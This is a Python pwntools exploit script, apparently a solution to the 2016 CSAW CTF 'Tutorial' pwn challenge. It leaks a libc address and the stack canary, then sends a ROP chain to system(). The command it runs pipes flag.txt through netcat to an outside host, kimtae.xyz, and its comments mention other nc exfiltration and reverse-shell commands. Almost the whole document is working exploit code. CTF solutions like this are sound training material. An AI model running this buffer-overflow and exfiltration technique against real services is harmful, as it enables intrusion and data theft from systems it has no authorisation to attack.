
2016 CSAW CTF — Tutorial (pwn): exploit script

by St1tch




from pwn import *
import stitch

# Set to True to target a local copy of the service listening on port 8005;
# otherwise talk to the CSAW scoreboard host.
local = False
s = remote('localhost', 8005) if local else remote('pwn.chal.csaw.io', 8002)

# Block until Enter is pressed so a debugger can be attached to the target
# before any traffic is exchanged.
raw_input()

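def solve():
    """Drive the three-stage exploit over the module-level tube ``s``.

    Stage 1 picks menu option 1, which prints a libc pointer; the script
    treats that pointer as ``puts - 0x500`` and looks the libc build up by
    the low 12 bits of the resulting puts address via ``stitch.find_libc``
    (expected to return the offsets of ``puts``, ``system`` and a
    ``pop rdi; ret`` gadget).  Stage 2 picks option 2 and fills the
    0x138-byte practice buffer exactly, so the echo that follows reveals the
    intact stack canary and the low dword of the saved rbp.  Stage 3 sends
    the ROP chain ``canary | fake rbp | pop rdi | &cmd | system`` with the
    command string trailing the chain, then drops into ``s.interactive()``.

    Side effects: reads/writes ``s``; updates the global progress handle
    ``p`` (created in ``__main__``).  Raises ValueError if the stage-1 leak
    line cannot be parsed or no libc candidate matches.
    """
    LEAK_TO_PUTS = 0x500    # 1280: leaked pointer + 0x500 == puts (per this script)
    BUF_TO_CANARY = 0x138   # bytes from the practice buffer start to the canary
    RBP_FIXUP = 48          # leaked saved-rbp value sits 48 above the rbp we use
    CMD_FROM_RBP = 32       # the script assumes &cmd == rbp + 32 once the chain lands

    # --- stage 1: libc leak ------------------------------------------------
    p.status('leak puts addr')
    s.recvuntil('>')
    sleep(1)
    s.sendline('1')
    leak_line = s.recvuntil('\n')
    if ':' not in leak_line:
        raise ValueError('unexpected leak line: %r' % (leak_line,))
    # int(..., 16) accepts the 0x prefix and surrounding whitespace itself.
    # The former .strip('0x') was a character-set strip that would also
    # have eaten trailing zero nibbles of the address.
    puts = int(leak_line.split(':')[1], 16) + LEAK_TO_PUTS

    low_bits = hex(puts)[-3:]
    candidates = stitch.find_libc({'puts': low_bits})
    if not candidates:
        raise ValueError('no libc candidate matches puts low bits %s' % low_bits)
    if len(candidates) > 1:
        # Several builds can share the same low 12 bits; the first wins, as before.
        log.warning('%d libc candidates, using the first' % len(candidates))
    libc = candidates[0]
    libc_base = puts - libc['puts']
    poprdi = libc_base + libc['poprdi_ret']
    system = libc_base + libc['system']

    log.success('puts addr = %s' % hex(puts))
    log.success('system addr = %s' % hex(system))
    log.success('poprdi addr = %s' % hex(poprdi))

    # --- stage 2: canary + saved rbp leak ---------------------------------
    p.status('leak canary')
    s.recvuntil('>')
    sleep(1)
    s.sendline('2')
    sleep(1)
    s.recvuntil('>')
    # 0x137 'a' plus the '\n' sendline appends make exactly 0x138 bytes, so
    # the canary's low null byte is not overwritten before it is echoed back.
    s.sendline('a' * (BUF_TO_CANARY - 1))

    # recvn() waits for exactly n bytes; a plain recv() may return a short
    # read and silently misalign the canary/rbp slices that follow.
    s.recvn(BUF_TO_CANARY)
    canary = u64(s.recvn(8))
    # Only the low dword of the saved rbp is consumed; the high half is
    # assumed to be 0x7fff.  NOTE(review): that holds for a typical x86-64
    # stack mapping but is not verified here.
    rbp = 0x00007fff00000000 + u32(s.recvn(4)) - RBP_FIXUP

    log.success('rbp = %s' % hex(rbp))
    log.success('canary = %s' % hex(canary))

    # --- stage 3: ROP chain ----------------------------------------------
    p.status('remote shell!')
    s.recvuntil('>')
    sleep(1)
    s.sendline('2')
    s.recvuntil('>')
    # The command ships the flag in clear text to an external listener; swap
    # the host/port for your own.  Other commands used while testing were
    # 'ls | nc kimtae.xyz 8888' and a reverse-shell pipe through two ports.
    cmd = 'cat flag.txt | nc kimtae.xyz 8888\x00'
    chain = [
        'a' * BUF_TO_CANARY,
        p64(canary),
        'a' * 8,                     # overwritten saved rbp slot (padding)
        p64(poprdi),
        p64(rbp + CMD_FROM_RBP),     # rdi = &cmd, assumed to follow the chain
        p64(system),
        cmd,                         # NUL-terminated so the shell string ends here
    ]
    sleep(1)
    s.sendline(''.join(chain))

    p.success('Sending cmd!')
    s.interactive()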

def main():
    """Entry point: open the progress spinner solve() reports through, then run it."""
    global p
    p = log.progress('Start pwning...')
    solve()


if __name__ == '__main__':
    main()


